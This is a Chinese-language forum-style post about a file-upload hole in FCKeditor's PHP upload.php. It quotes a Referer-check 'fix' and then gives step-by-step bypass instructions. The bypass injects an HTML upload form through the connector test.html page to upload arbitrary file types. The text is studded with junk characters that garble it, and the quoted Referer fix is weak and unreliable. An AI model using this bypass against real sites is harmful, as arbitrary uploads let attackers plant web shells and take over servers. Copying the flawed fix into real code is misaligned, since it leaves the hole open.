漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php! w% E# k& I0 P% v
网上给出的修复方案是! Z" \3 u0 _( {3 Z8 ]8 d
修复方法,删除FCK编辑器用其他的编辑器
" t2 ]6 g2 ~* X d! ^+ u0 u或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
6 z0 o V3 B: D& a. H0 x: X在2 u0 r. ~$ p/ R% q0 X
require(‘config.php’);
* F" q1 M) O. I6 \% r; rrequire(‘util.php’);
^- l/ L, N: o! d的下面添加以下代码—————————–
9 g/ O9 |: g% R9 w/ t6 a2 B' A//防止外部提交- X/ U4 d, q5 q6 w
function outsidepost()
" o% {- H4 W" T! A5 {7 C- [+ F{% Z1 \+ J9 F1 r7 n& }
$servername=$_SERVER['SERVER_NAME'];6 g! f3 z; q R6 j6 g B) `
$sub_from=@$_SERVER['HTTP_REFERER'];7 @) s. ~- k7 P/ s) v
$sub_len=strlen($servername);
; }% [7 M9 x* X6 d2 u$checkfrom=substr($sub_from,7,$sub_len);5 O, n& W0 y' @- O9 A
if($checkfrom!=$servername){
8 u# ^6 E/ m$ S& g5 `1 Fecho(“you don’t outsidepost!”);
7 W8 g2 ?+ V0 k' X0 p* zexit;. I6 c7 X* w6 q- f+ p$ s
}9 W% R b! ~) w4 V" V5 S2 j8 f2 J
}" B2 ~3 A+ W) k: q
outsidepost();6 W5 }* u" f& ]. {1 b
防止外部提交,但是没有防止内部提交,
, U5 U4 K. `( C* Q, e9 }0 Z利用方法:
: l4 O: M9 k5 m/ }1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html; ?, ?* [- G# z {. f
2,在Current Folder 框输入, Y/ E2 Z- Y s1 K2 O5 [$ Y3 p
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>0 S `/ |' O$ S5 h
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
8 x& N4 R$ v* c3 BPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |